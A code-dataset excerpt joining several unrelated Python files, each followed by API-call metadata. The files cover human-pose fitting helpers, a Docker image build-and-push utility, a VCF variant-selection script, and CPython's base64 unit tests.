                rot_vec, jac = cv2.Rodrigues(pose_body_mats[j])
                pose_body[3 * j: 3 * j + 3] = rot_vec.reshape(-1)
pose_body_list.append(pose_body)
pose_body = np.array(pose_body_list)
pose_jaw = poses[:, 32:35]
pose_eye = poses[:, 35:41]
pose_hand = poses[:, 41:-6]
else:
pose_body = poses[:, 0:63]
pose_jaw = poses[:, 63:66]
pose_eye = poses[:, 66:72]
pose_hand = poses[:, 72:-6]
if dev_orient is not None:
for i in range(n):
rot_mat = cv2.Rodrigues(rot[i].reshape(3, 1))[0]
dev_mat = cv2.Rodrigues(dev_orient.reshape(3, 1))[0]
rot_mat = dev_mat @ rot_mat
rot[i] = cv2.Rodrigues(rot_mat)[0].reshape(-1)
trans[i] = (dev_mat @ trans[i].reshape(3, 1) + dev_trans.reshape(3, 1)).reshape(-1)
result = {
'global_rvec': rot,
'global_tvec': trans,
'body_pose': pose_body,
'hand_pose': pose_hand,
'jaw_pose': pose_jaw,
'eye_pose': pose_eye,
'face_expression': face_expressions,
'betas': betas,
'n': n,
'frame_index2fit_index': frame_index2fit_index,
'is_male': is_male,
'is_vposer': is_vposer
}
return result
def load_avakhitov_fits(dp, load_betas=True, load_body_poses=True, load_expressions=False, load_fid_lst=True):
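    # Load the requested fit arrays (betas, body poses, expressions, frame id list) from
    # directory dp, decoding VPoser body-pose embeddings back to axis-angle where needed.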
result = dict()
for flag, k, fn_no_ext in [
[load_betas, 'betas', 'betas'],
[load_body_poses, 'body_poses', 'poses'],
[load_expressions, 'expressions', 'expressions'],
[load_fid_lst, 'fid_lst', 'fid_lst']
]:
if flag:
load_fp = osp.join(dp, f'{fn_no_ext}.npy')
try:
loaded = np.load(load_fp)
except:
print(load_fp)
raise Exception()
if fn_no_ext == 'poses':
#load the vposer model
if loaded.shape[1] == 69:
pose_body = loaded[:, 0:32]
else:
vposer, _ = load_vposer(vposer_ckpt, vp_model='snapshot')
vposer.eval()
pose_body_vp = torch.tensor(loaded[:, 0:32])
#convert from vposer to rotation matrices
pose_body_mats = vposer.decode(pose_body_vp).reshape(len(loaded), -1, 3, 3).detach().cpu().numpy()
pose_body = np.zeros((pose_body_mats.shape[0], 63))
for i in range(0, pose_body_mats.shape[0]):
for j in range(0, pose_body_mats.shape[1]):
rot_vec, jac = cv2.Rodrigues(pose_body_mats[i,j])
pose_body[i, 3*j : 3*j+3] = rot_vec.reshape(-1)
result[k] = pose_body
result['global_rvecs'] = loaded[:, -3:]
result['global_tvecs'] = loaded[:, -6:-3]
result['n'] = len(loaded)
else:
result[k] = loaded
return result
def batch_rodrigues(rot_vecs, epsilon=1e-8, dtype=torch.float32):
''' Calculates the rotation matrices for a batch of rotation vectors
Parameters
----------
rot_vecs: torch.tensor Nx3
array of N axis-angle vectors
Returns
-------
R: torch.tensor Nx3x3
The rotation matrices for the given axis-angle parameters
'''
batch_size = rot_vecs.shape[0]
device = rot_vecs.device
angle = torch.norm(rot_vecs + 1e-8, dim=1, keepdim=True)
rot_dir = rot_vecs / angle
cos = torch.unsqueeze(torch.cos(angle), dim=1)
sin = torch.unsqueeze(torch.sin(angle), dim=1)
# Bx1 arrays
rx, ry, rz = torch.split(rot_dir, 1, dim=1)
K = torch.zeros((batch_size, 3, 3), dtype=dtype, device=device)
zeros = torch.zeros((batch_size, 1), dtype=dtype, device=device)
K = torch.cat([zeros, -rz, ry, rz, zeros, -rx, -ry, rx, zeros], dim=1) \
.view((batch_size, 3, 3))
ident = torch.eye(3, dtype=dtype, device=device).unsqueeze(dim=0)
rot_mat = ident + sin * K + (1 - cos) * torch.bmm(K, K)
return rot_mat
def get_selected_ids(id_sel_set, req_ids):
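    # For each id in req_ids, return its index within id_sel_set (or -1 if absent),
    # computed by merging the two id lists in sorted order.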
ss_sort = np.argsort(id_sel_set)
req_sort = np.argsort(req_ids)
id_ss_srt = id_sel_set[ss_sort]
id_ss_pos = np.arange(0, len(id_sel_set))[ss_sort]
req_srt = req_ids[req_sort]
req_srt_pos = -1 * np.ones(len(req_srt), dtype=int)
i = 0
j = 0
while i < len(id_ss_srt) and j < len(req_srt):
if req_srt[j] == id_ss_srt[i]:
req_srt_pos[j] = id_ss_pos[i]
i += 1
j += 1
elif req_srt[j] < id_ss_srt[i]:
j += 1
elif id_ss_srt[i] < req_srt[j]:
i += 1
req_ids_ans = -1 * np.ones(len(req_srt), dtype=int)
req_ids_ans[req_sort] = req_srt_pos
return req_ids_ans
| [((16, 12, 16, 45), 'numpy.load', 'np.load', ({(16, 20, 16, 44): "part_path + '/betas.npy'"}, {}), "(part_path + '/betas.npy')", True, 'import numpy as np\n'), ((17, 14, 17, 49), 'numpy.load', 'np.load', ({(17, 22, 17, 48): "part_path + '/fid_lst.npy'"}, {}), "(part_path + '/fid_lst.npy')", True, 'import numpy as np\n'), ((149, 12, 149, 60), 'torch.norm', 'torch.norm', (), '', False, 'import torch\n'), ((156, 17, 156, 47), 'torch.split', 'torch.split', (), '', False, 'import torch\n'), ((157, 8, 157, 67), 'torch.zeros', 'torch.zeros', (), '', False, 'import torch\n'), ((159, 12, 159, 68), 'torch.zeros', 'torch.zeros', (), '', False, 'import torch\n'), ((169, 14, 169, 36), 'numpy.argsort', 'np.argsort', ({(169, 25, 169, 35): 'id_sel_set'}, {}), '(id_sel_set)', True, 'import numpy as np\n'), ((170, 15, 170, 34), 'numpy.argsort', 'np.argsort', ({(170, 26, 170, 33): 'req_ids'}, {}), '(req_ids)', True, 'import numpy as np\n'), ((14, 12, 14, 45), 'numpy.load', 'np.load', ({(14, 20, 14, 44): "(part_path + '/poses.npy')"}, {}), "(part_path + '/poses.npy')", True, 'import numpy as np\n'), ((19, 17, 19, 29), 'json.load', 'json.load', ({(19, 27, 19, 28): 'f'}, {}), '(f)', False, 'import json\n'), ((43, 21, 43, 59), 'numpy.load', 'np.load', ({(43, 29, 43, 58): "part_path + '/dev_orient.npy'"}, {}), "(part_path + '/dev_orient.npy')", True, 'import numpy as np\n'), ((44, 20, 44, 57), 'numpy.load', 'np.load', ({(44, 28, 44, 56): "part_path + '/dev_trans.npy'"}, {}), "(part_path + '/dev_trans.npy')", True, 'import numpy as np\n'), ((50, 23, 50, 51), 'torch.tensor', 'torch.tensor', ({(50, 36, 50, 50): 'poses[:, 0:32]'}, {}), '(poses[:, 0:32])', False, 'import torch\n'), ((60, 20, 60, 44), 'numpy.array', 'np.array', ({(60, 29, 60, 43): 'pose_body_list'}, {}), '(pose_body_list)', True, 'import numpy as np\n'), ((152, 26, 152, 42), 'torch.cos', 'torch.cos', ({(152, 36, 152, 41): 'angle'}, {}), '(angle)', False, 'import torch\n'), ((153, 26, 153, 42), 'torch.sin', 'torch.sin', ({(153, 36, 153, 41): 'angle'}, {}), '(angle)', False, 'import torch\n'), ((15, 23, 15, 62), 'numpy.load', 'np.load', ({(15, 31, 15, 61): "(part_path + '/expressions.npy')"}, {}), "(part_path + '/expressions.npy')", True, 'import numpy as np\n'), ((55, 24, 55, 36), 'numpy.zeros', 'np.zeros', ({(55, 33, 55, 35): '63'}, {}), '(63)', True, 'import numpy as np\n'), ((103, 22, 103, 54), 'os.path.join', 'osp.join', ({(103, 31, 103, 33): 'dp', (103, 35, 103, 53): 'f"""{fn_no_ext}.npy"""'}, {}), "(dp, f'{fn_no_ext}.npy')", True, 'import os.path as osp\n'), ((160, 8, 160, 74), 'torch.cat', 'torch.cat', (), '', False, 'import torch\n'), ((163, 12, 163, 52), 'torch.eye', 'torch.eye', (), '', False, 'import torch\n'), ((164, 44, 164, 59), 'torch.bmm', 'torch.bmm', ({(164, 54, 164, 55): 'K', (164, 57, 164, 58): 'K'}, {}), '(K, K)', False, 'import torch\n'), ((57, 31, 57, 63), 'cv2.Rodrigues', 'cv2.Rodrigues', ({(57, 45, 57, 62): 'pose_body_mats[i]'}, {}), '(pose_body_mats[i])', False, 'import cv2\n'), ((105, 25, 105, 41), 'numpy.load', 'np.load', ({(105, 33, 105, 40): 'load_fp'}, {}), '(load_fp)', True, 'import numpy as np\n'), ((115, 32, 115, 77), 'human_body_prior.tools.model_loader.load_vposer', 'load_vposer', (), '', False, 'from human_body_prior.tools.model_loader import load_vposer\n'), ((117, 35, 117, 64), 'torch.tensor', 'torch.tensor', ({(117, 48, 117, 63): 'loaded[:, 0:32]'}, {}), '(loaded[:, 0:32])', False, 'import torch\n'), ((120, 32, 120, 71), 'numpy.zeros', 'np.zeros', ({(120, 41, 120, 70): '(pose_body_mats.shape[0], 63)'}, {}), 
'((pose_body_mats.shape[0], 63))', True, 'import numpy as np\n'), ((75, 21, 75, 43), 'cv2.Rodrigues', 'cv2.Rodrigues', ({(75, 35, 75, 42): 'rot_mat'}, {}), '(rot_mat)', False, 'import cv2\n'), ((123, 43, 123, 77), 'cv2.Rodrigues', 'cv2.Rodrigues', ({(123, 57, 123, 76): 'pose_body_mats[i, j]'}, {}), '(pose_body_mats[i, j])', False, 'import cv2\n')] |
axelbarjon/mongodb-kubernetes-operator | scripts/dev/dockerutil.py | 13eb844c55774ce8a6de51edde1a66b4371f3ef6 | import docker
from dockerfile_generator import render
import os
import json
from tqdm import tqdm
from typing import Union, Any, Optional
def build_image(repo_url: str, tag: str, path: str) -> None:
"""
build_image builds the image with the given tag
"""
client = docker.from_env()
print(f"Building image: {tag}")
client.images.build(tag=tag, path=path)
print("Successfully built image!")
def push_image(tag: str) -> None:
"""
push_image pushes the given tag. It uses
the current docker environment
"""
client = docker.from_env()
print(f"Pushing image: {tag}")
with tqdm(total=100, ascii=False) as progress_bar:
last_percent = 0.0
for line in client.images.push(tag, stream=True):
percent = get_completion_percentage(line)
if percent:
progress_bar.update(percent - last_percent)
last_percent = percent
def retag_image(
old_repo_url: str,
new_repo_url: str,
old_tag: str,
new_tag: str,
path: str,
labels: Optional[dict] = None,
username: Optional[str] = None,
password: Optional[str] = None,
registry: Optional[str] = None,
) -> None:
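    """
    retag_image builds an image based on old_repo_url:old_tag, tags it as
    new_repo_url:new_tag and pushes it, unless that tag already exists in the registry
    """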
with open(f"{path}/Dockerfile", "w") as f:
f.write(f"FROM {old_repo_url}:{old_tag}")
client = docker.from_env()
if all(value is not None for value in [username, password, registry]):
client.login(username=username, password=password, registry=registry)
image, _ = client.images.build(path=f"{path}", labels=labels, tag=new_tag)
image.tag(new_repo_url, new_tag)
os.remove(f"{path}/Dockerfile")
# We do not want to republish an image that has not changed, so we check if the new
# pair repo:tag already exists.
try:
image = client.images.pull(new_repo_url, new_tag)
return
# We also need to catch APIError as if the image has been recently deleted (uncommon, but might happen?)
# we will get this kind of error:
# docker.errors.APIError: 500 Server Error: Internal Server Error
# ("unknown: Tag <tag> was deleted or has expired. To pull, revive via time machine"
except (docker.errors.ImageNotFound, docker.errors.APIError) as e:
pass
print(f"Pushing to {new_repo_url}:{new_tag}")
client.images.push(new_repo_url, new_tag)
def get_completion_percentage(line: Any) -> float:
try:
line = json.loads(line.strip().decode("utf-8"))
except ValueError:
return 0
to_skip = ("Preparing", "Waiting", "Layer already exists")
if "status" in line:
if line["status"] in to_skip:
return 0
if line["status"] == "Pushing":
try:
current = float(line["progressDetail"]["current"])
total = float(line["progressDetail"]["total"])
except KeyError:
return 0
result = (current / total) * 100
if result > 100.0:
return 100.0
return result
return 0
def build_and_push_image(repo_url: str, tag: str, path: str, image_type: str) -> None:
"""
    build_and_push_image creates the Dockerfile for the given image type,
    builds the image and pushes it to the target repo
"""
dockerfile_text = render(image_type, ["."])
with open(f"{path}/Dockerfile", "w") as f:
f.write(dockerfile_text)
build_image(repo_url, tag, path)
os.remove(f"{path}/Dockerfile")
push_image(tag)
| [((14, 13, 14, 30), 'docker.from_env', 'docker.from_env', ({}, {}), '()', False, 'import docker\n'), ((25, 13, 25, 30), 'docker.from_env', 'docker.from_env', ({}, {}), '()', False, 'import docker\n'), ((49, 13, 49, 30), 'docker.from_env', 'docker.from_env', ({}, {}), '()', False, 'import docker\n'), ((55, 4, 55, 35), 'os.remove', 'os.remove', ({(55, 14, 55, 34): 'f"""{path}/Dockerfile"""'}, {}), "(f'{path}/Dockerfile')", False, 'import os\n'), ((100, 22, 100, 47), 'dockerfile_generator.render', 'render', ({(100, 29, 100, 39): 'image_type', (100, 41, 100, 46): "['.']"}, {}), "(image_type, ['.'])", False, 'from dockerfile_generator import render\n'), ((105, 4, 105, 35), 'os.remove', 'os.remove', ({(105, 14, 105, 34): 'f"""{path}/Dockerfile"""'}, {}), "(f'{path}/Dockerfile')", False, 'import os\n'), ((27, 9, 27, 37), 'tqdm.tqdm', 'tqdm', (), '', False, 'from tqdm import tqdm\n')] |
elowy01/igsr_analysis | scripts/VCF/UTILS/select_variants.py | ffea4885227c2299f886a4f41e70b6e1f6bb43da | from VcfFilter import VcfFilter
import argparse
import os
#get command line arguments
parser = argparse.ArgumentParser(description='Script to select a certain variant type from a VCF file')
#parameters
parser.add_argument('--bcftools_folder', type=str, required=True, help='Folder containing the Bcftools binary' )
parser.add_argument('--filename', type=str, required=True, help='Name (without the fullpath) of the VCF file that will be analysed. It assumes that the filename format is for example lc_bams.gatk.xxxx.vcf.gz, where lc_bams is the analysis group and gatk is the method used' )
parser.add_argument('--type', type=str, required=False, help='Type of variant to select. i.e. snps/indels etc' )
args = parser.parse_args()
if __name__ == '__main__':
vcf_f=VcfFilter(vcf=args.filename,bcftools_folder=args.bcftools_folder)
vcf_f.filter_by_variant_type(type=args.type)
| [((8, 9, 8, 103), 'argparse.ArgumentParser', 'argparse.ArgumentParser', (), '', False, 'import argparse\n'), ((19, 10, 19, 75), 'VcfFilter.VcfFilter', 'VcfFilter', (), '', False, 'from VcfFilter import VcfFilter\n')] |
martinphellwig/brython_wf | site/tests/unittests/test/test_base64.py | e169afc1e048cba0c12118b4cd6f109df6fe67c9 | import unittest
from test import support
import base64
import binascii
import os
import sys
import subprocess
class LegacyBase64TestCase(unittest.TestCase):
def test_encodebytes(self):
eq = self.assertEqual
eq(base64.encodebytes(b"www.python.org"), b"d3d3LnB5dGhvbi5vcmc=\n")
eq(base64.encodebytes(b"a"), b"YQ==\n")
eq(base64.encodebytes(b"ab"), b"YWI=\n")
eq(base64.encodebytes(b"abc"), b"YWJj\n")
eq(base64.encodebytes(b""), b"")
eq(base64.encodebytes(b"abcdefghijklmnopqrstuvwxyz"
b"ABCDEFGHIJKLMNOPQRSTUVWXYZ"
b"0123456789!@#0^&*();:<>,. []{}"),
b"YWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXpBQkNE"
b"RUZHSElKS0xNTk9QUVJTVFVWV1hZWjAxMjM0\nNT"
b"Y3ODkhQCMwXiYqKCk7Ojw+LC4gW117fQ==\n")
# Non-bytes
eq(base64.encodebytes(bytearray(b'abc')), b'YWJj\n')
self.assertRaises(TypeError, base64.encodebytes, "")
def test_decodebytes(self):
eq = self.assertEqual
eq(base64.decodebytes(b"d3d3LnB5dGhvbi5vcmc=\n"), b"www.python.org")
eq(base64.decodebytes(b"YQ==\n"), b"a")
eq(base64.decodebytes(b"YWI=\n"), b"ab")
eq(base64.decodebytes(b"YWJj\n"), b"abc")
eq(base64.decodebytes(b"YWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXpBQkNE"
b"RUZHSElKS0xNTk9QUVJTVFVWV1hZWjAxMjM0\nNT"
b"Y3ODkhQCMwXiYqKCk7Ojw+LC4gW117fQ==\n"),
b"abcdefghijklmnopqrstuvwxyz"
b"ABCDEFGHIJKLMNOPQRSTUVWXYZ"
b"0123456789!@#0^&*();:<>,. []{}")
eq(base64.decodebytes(b''), b'')
# Non-bytes
eq(base64.decodebytes(bytearray(b'YWJj\n')), b'abc')
self.assertRaises(TypeError, base64.decodebytes, "")
def test_encode(self):
eq = self.assertEqual
from io import BytesIO, StringIO
infp = BytesIO(b'abcdefghijklmnopqrstuvwxyz'
b'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
b'0123456789!@#0^&*();:<>,. []{}')
outfp = BytesIO()
base64.encode(infp, outfp)
eq(outfp.getvalue(),
b'YWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXpBQkNE'
b'RUZHSElKS0xNTk9QUVJTVFVWV1hZWjAxMjM0\nNT'
b'Y3ODkhQCMwXiYqKCk7Ojw+LC4gW117fQ==\n')
# Non-binary files
self.assertRaises(TypeError, base64.encode, StringIO('abc'), BytesIO())
self.assertRaises(TypeError, base64.encode, BytesIO(b'abc'), StringIO())
self.assertRaises(TypeError, base64.encode, StringIO('abc'), StringIO())
def test_decode(self):
from io import BytesIO, StringIO
infp = BytesIO(b'd3d3LnB5dGhvbi5vcmc=')
outfp = BytesIO()
base64.decode(infp, outfp)
self.assertEqual(outfp.getvalue(), b'www.python.org')
# Non-binary files
self.assertRaises(TypeError, base64.encode, StringIO('YWJj\n'), BytesIO())
self.assertRaises(TypeError, base64.encode, BytesIO(b'YWJj\n'), StringIO())
self.assertRaises(TypeError, base64.encode, StringIO('YWJj\n'), StringIO())
class BaseXYTestCase(unittest.TestCase):
def test_b64encode(self):
eq = self.assertEqual
# Test default alphabet
eq(base64.b64encode(b"www.python.org"), b"d3d3LnB5dGhvbi5vcmc=")
eq(base64.b64encode(b'\x00'), b'AA==')
eq(base64.b64encode(b"a"), b"YQ==")
eq(base64.b64encode(b"ab"), b"YWI=")
eq(base64.b64encode(b"abc"), b"YWJj")
eq(base64.b64encode(b""), b"")
eq(base64.b64encode(b"abcdefghijklmnopqrstuvwxyz"
b"ABCDEFGHIJKLMNOPQRSTUVWXYZ"
b"0123456789!@#0^&*();:<>,. []{}"),
b"YWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXpBQkNE"
b"RUZHSElKS0xNTk9QUVJTVFVWV1hZWjAxMjM0NT"
b"Y3ODkhQCMwXiYqKCk7Ojw+LC4gW117fQ==")
# Test with arbitrary alternative characters
eq(base64.b64encode(b'\xd3V\xbeo\xf7\x1d', altchars=b'*$'), b'01a*b$cd')
# Non-bytes
eq(base64.b64encode(bytearray(b'abcd')), b'YWJjZA==')
eq(base64.b64encode(b'\xd3V\xbeo\xf7\x1d', altchars=bytearray(b'*$')),
b'01a*b$cd')
# Check if passing a str object raises an error
self.assertRaises(TypeError, base64.b64encode, "")
self.assertRaises(TypeError, base64.b64encode, b"", altchars="")
# Test standard alphabet
eq(base64.standard_b64encode(b"www.python.org"), b"d3d3LnB5dGhvbi5vcmc=")
eq(base64.standard_b64encode(b"a"), b"YQ==")
eq(base64.standard_b64encode(b"ab"), b"YWI=")
eq(base64.standard_b64encode(b"abc"), b"YWJj")
eq(base64.standard_b64encode(b""), b"")
eq(base64.standard_b64encode(b"abcdefghijklmnopqrstuvwxyz"
b"ABCDEFGHIJKLMNOPQRSTUVWXYZ"
b"0123456789!@#0^&*();:<>,. []{}"),
b"YWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXpBQkNE"
b"RUZHSElKS0xNTk9QUVJTVFVWV1hZWjAxMjM0NT"
b"Y3ODkhQCMwXiYqKCk7Ojw+LC4gW117fQ==")
# Non-bytes
eq(base64.standard_b64encode(bytearray(b'abcd')), b'YWJjZA==')
# Check if passing a str object raises an error
self.assertRaises(TypeError, base64.standard_b64encode, "")
# Test with 'URL safe' alternative characters
eq(base64.urlsafe_b64encode(b'\xd3V\xbeo\xf7\x1d'), b'01a-b_cd')
# Non-bytes
eq(base64.urlsafe_b64encode(bytearray(b'\xd3V\xbeo\xf7\x1d')), b'01a-b_cd')
# Check if passing a str object raises an error
self.assertRaises(TypeError, base64.urlsafe_b64encode, "")
def test_b64decode(self):
eq = self.assertEqual
tests = {b"d3d3LnB5dGhvbi5vcmc=": b"www.python.org",
b'AA==': b'\x00',
b"YQ==": b"a",
b"YWI=": b"ab",
b"YWJj": b"abc",
b"YWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXpBQkNE"
b"RUZHSElKS0xNTk9QUVJTVFVWV1hZWjAxMjM0\nNT"
b"Y3ODkhQCMwXiYqKCk7Ojw+LC4gW117fQ==":
b"abcdefghijklmnopqrstuvwxyz"
b"ABCDEFGHIJKLMNOPQRSTUVWXYZ"
b"0123456789!@#0^&*();:<>,. []{}",
b'': b'',
}
for data, res in tests.items():
eq(base64.b64decode(data), res)
eq(base64.b64decode(data.decode('ascii')), res)
# Non-bytes
eq(base64.b64decode(bytearray(b"YWJj")), b"abc")
# Test with arbitrary alternative characters
tests_altchars = {(b'01a*b$cd', b'*$'): b'\xd3V\xbeo\xf7\x1d',
}
for (data, altchars), res in tests_altchars.items():
data_str = data.decode('ascii')
altchars_str = altchars.decode('ascii')
eq(base64.b64decode(data, altchars=altchars), res)
eq(base64.b64decode(data_str, altchars=altchars), res)
eq(base64.b64decode(data, altchars=altchars_str), res)
eq(base64.b64decode(data_str, altchars=altchars_str), res)
# Test standard alphabet
for data, res in tests.items():
eq(base64.standard_b64decode(data), res)
eq(base64.standard_b64decode(data.decode('ascii')), res)
# Non-bytes
eq(base64.standard_b64decode(bytearray(b"YWJj")), b"abc")
# Test with 'URL safe' alternative characters
tests_urlsafe = {b'01a-b_cd': b'\xd3V\xbeo\xf7\x1d',
b'': b'',
}
for data, res in tests_urlsafe.items():
eq(base64.urlsafe_b64decode(data), res)
eq(base64.urlsafe_b64decode(data.decode('ascii')), res)
# Non-bytes
eq(base64.urlsafe_b64decode(bytearray(b'01a-b_cd')), b'\xd3V\xbeo\xf7\x1d')
def test_b64decode_padding_error(self):
self.assertRaises(binascii.Error, base64.b64decode, b'abc')
self.assertRaises(binascii.Error, base64.b64decode, 'abc')
def test_b64decode_invalid_chars(self):
# issue 1466065: Test some invalid characters.
tests = ((b'%3d==', b'\xdd'),
(b'$3d==', b'\xdd'),
(b'[==', b''),
(b'YW]3=', b'am'),
(b'3{d==', b'\xdd'),
(b'3d}==', b'\xdd'),
(b'@@', b''),
(b'!', b''),
(b'YWJj\nYWI=', b'abcab'))
for bstr, res in tests:
self.assertEqual(base64.b64decode(bstr), res)
self.assertEqual(base64.b64decode(bstr.decode('ascii')), res)
with self.assertRaises(binascii.Error):
base64.b64decode(bstr, validate=True)
with self.assertRaises(binascii.Error):
base64.b64decode(bstr.decode('ascii'), validate=True)
def test_b32encode(self):
eq = self.assertEqual
eq(base64.b32encode(b''), b'')
eq(base64.b32encode(b'\x00'), b'AA======')
eq(base64.b32encode(b'a'), b'ME======')
eq(base64.b32encode(b'ab'), b'MFRA====')
eq(base64.b32encode(b'abc'), b'MFRGG===')
eq(base64.b32encode(b'abcd'), b'MFRGGZA=')
eq(base64.b32encode(b'abcde'), b'MFRGGZDF')
# Non-bytes
eq(base64.b32encode(bytearray(b'abcd')), b'MFRGGZA=')
self.assertRaises(TypeError, base64.b32encode, "")
def test_b32decode(self):
eq = self.assertEqual
tests = {b'': b'',
b'AA======': b'\x00',
b'ME======': b'a',
b'MFRA====': b'ab',
b'MFRGG===': b'abc',
b'MFRGGZA=': b'abcd',
b'MFRGGZDF': b'abcde',
}
for data, res in tests.items():
eq(base64.b32decode(data), res)
eq(base64.b32decode(data.decode('ascii')), res)
# Non-bytes
eq(base64.b32decode(bytearray(b'MFRGG===')), b'abc')
def test_b32decode_casefold(self):
eq = self.assertEqual
tests = {b'': b'',
b'ME======': b'a',
b'MFRA====': b'ab',
b'MFRGG===': b'abc',
b'MFRGGZA=': b'abcd',
b'MFRGGZDF': b'abcde',
# Lower cases
b'me======': b'a',
b'mfra====': b'ab',
b'mfrgg===': b'abc',
b'mfrggza=': b'abcd',
b'mfrggzdf': b'abcde',
}
for data, res in tests.items():
eq(base64.b32decode(data, True), res)
eq(base64.b32decode(data.decode('ascii'), True), res)
self.assertRaises(binascii.Error, base64.b32decode, b'me======')
self.assertRaises(binascii.Error, base64.b32decode, 'me======')
# Mapping zero and one
eq(base64.b32decode(b'MLO23456'), b'b\xdd\xad\xf3\xbe')
eq(base64.b32decode('MLO23456'), b'b\xdd\xad\xf3\xbe')
map_tests = {(b'M1023456', b'L'): b'b\xdd\xad\xf3\xbe',
(b'M1023456', b'I'): b'b\x1d\xad\xf3\xbe',
}
for (data, map01), res in map_tests.items():
data_str = data.decode('ascii')
map01_str = map01.decode('ascii')
eq(base64.b32decode(data, map01=map01), res)
eq(base64.b32decode(data_str, map01=map01), res)
eq(base64.b32decode(data, map01=map01_str), res)
eq(base64.b32decode(data_str, map01=map01_str), res)
self.assertRaises(binascii.Error, base64.b32decode, data)
self.assertRaises(binascii.Error, base64.b32decode, data_str)
def test_b32decode_error(self):
for data in [b'abc', b'ABCDEF==', b'==ABCDEF']:
with self.assertRaises(binascii.Error):
base64.b32decode(data)
with self.assertRaises(binascii.Error):
base64.b32decode(data.decode('ascii'))
def test_b16encode(self):
eq = self.assertEqual
eq(base64.b16encode(b'\x01\x02\xab\xcd\xef'), b'0102ABCDEF')
eq(base64.b16encode(b'\x00'), b'00')
# Non-bytes
eq(base64.b16encode(bytearray(b'\x01\x02\xab\xcd\xef')), b'0102ABCDEF')
self.assertRaises(TypeError, base64.b16encode, "")
def test_b16decode(self):
eq = self.assertEqual
eq(base64.b16decode(b'0102ABCDEF'), b'\x01\x02\xab\xcd\xef')
eq(base64.b16decode('0102ABCDEF'), b'\x01\x02\xab\xcd\xef')
eq(base64.b16decode(b'00'), b'\x00')
eq(base64.b16decode('00'), b'\x00')
# Lower case is not allowed without a flag
self.assertRaises(binascii.Error, base64.b16decode, b'0102abcdef')
self.assertRaises(binascii.Error, base64.b16decode, '0102abcdef')
# Case fold
eq(base64.b16decode(b'0102abcdef', True), b'\x01\x02\xab\xcd\xef')
eq(base64.b16decode('0102abcdef', True), b'\x01\x02\xab\xcd\xef')
# Non-bytes
eq(base64.b16decode(bytearray(b"0102ABCDEF")), b'\x01\x02\xab\xcd\xef')
def test_decode_nonascii_str(self):
decode_funcs = (base64.b64decode,
base64.standard_b64decode,
base64.urlsafe_b64decode,
base64.b32decode,
base64.b16decode)
for f in decode_funcs:
self.assertRaises(ValueError, f, 'with non-ascii \xcb')
def test_ErrorHeritage(self):
self.assertTrue(issubclass(binascii.Error, ValueError))
class TestMain(unittest.TestCase):
def tearDown(self):
if os.path.exists(support.TESTFN):
os.unlink(support.TESTFN)
def get_output(self, *args, **options):
args = (sys.executable, '-m', 'base64') + args
return subprocess.check_output(args, **options)
def test_encode_decode(self):
output = self.get_output('-t')
self.assertSequenceEqual(output.splitlines(), (
b"b'Aladdin:open sesame'",
br"b'QWxhZGRpbjpvcGVuIHNlc2FtZQ==\n'",
b"b'Aladdin:open sesame'",
))
def test_encode_file(self):
with open(support.TESTFN, 'wb') as fp:
fp.write(b'a\xffb\n')
output = self.get_output('-e', support.TESTFN)
self.assertEqual(output.rstrip(), b'Yf9iCg==')
with open(support.TESTFN, 'rb') as fp:
output = self.get_output('-e', stdin=fp)
self.assertEqual(output.rstrip(), b'Yf9iCg==')
def test_decode(self):
with open(support.TESTFN, 'wb') as fp:
fp.write(b'Yf9iCg==')
output = self.get_output('-d', support.TESTFN)
self.assertEqual(output.rstrip(), b'a\xffb')
def test_main():
support.run_unittest(__name__)
if __name__ == '__main__':
test_main()
| [((349, 4, 349, 34), 'test.support.run_unittest', 'support.run_unittest', ({(349, 25, 349, 33): '__name__'}, {}), '(__name__)', False, 'from test import support\n'), ((49, 15, 51, 57), 'io.BytesIO', 'BytesIO', ({(49, 23, 51, 56): "b'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#0^&*();:<>,. []{}'"}, {}), "(\n b'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#0^&*();:<>,. []{}'\n )", False, 'from io import BytesIO, StringIO\n'), ((52, 16, 52, 25), 'io.BytesIO', 'BytesIO', ({}, {}), '()', False, 'from io import BytesIO, StringIO\n'), ((53, 8, 53, 34), 'base64.encode', 'base64.encode', ({(53, 22, 53, 26): 'infp', (53, 28, 53, 33): 'outfp'}, {}), '(infp, outfp)', False, 'import base64\n'), ((65, 15, 65, 47), 'io.BytesIO', 'BytesIO', ({(65, 23, 65, 46): "b'd3d3LnB5dGhvbi5vcmc='"}, {}), "(b'd3d3LnB5dGhvbi5vcmc=')", False, 'from io import BytesIO, StringIO\n'), ((66, 16, 66, 25), 'io.BytesIO', 'BytesIO', ({}, {}), '()', False, 'from io import BytesIO, StringIO\n'), ((67, 8, 67, 34), 'base64.decode', 'base64.decode', ({(67, 22, 67, 26): 'infp', (67, 28, 67, 33): 'outfp'}, {}), '(infp, outfp)', False, 'import base64\n'), ((314, 11, 314, 41), 'os.path.exists', 'os.path.exists', ({(314, 26, 314, 40): 'support.TESTFN'}, {}), '(support.TESTFN)', False, 'import os\n'), ((319, 15, 319, 55), 'subprocess.check_output', 'subprocess.check_output', ({(319, 39, 319, 43): 'args'}, {}), '(args, **options)', False, 'import subprocess\n'), ((14, 11, 14, 48), 'base64.encodebytes', 'base64.encodebytes', ({(14, 30, 14, 47): "b'www.python.org'"}, {}), "(b'www.python.org')", False, 'import base64\n'), ((15, 11, 15, 35), 'base64.encodebytes', 'base64.encodebytes', ({(15, 30, 15, 34): "b'a'"}, {}), "(b'a')", False, 'import base64\n'), ((16, 11, 16, 36), 'base64.encodebytes', 'base64.encodebytes', ({(16, 30, 16, 35): "b'ab'"}, {}), "(b'ab')", False, 'import base64\n'), ((17, 11, 17, 37), 'base64.encodebytes', 'base64.encodebytes', ({(17, 30, 17, 36): "b'abc'"}, {}), "(b'abc')", False, 'import base64\n'), ((18, 11, 18, 34), 'base64.encodebytes', 'base64.encodebytes', ({(18, 30, 18, 33): "b''"}, {}), "(b'')", False, 'import base64\n'), ((19, 11, 21, 65), 'base64.encodebytes', 'base64.encodebytes', ({(19, 30, 21, 64): 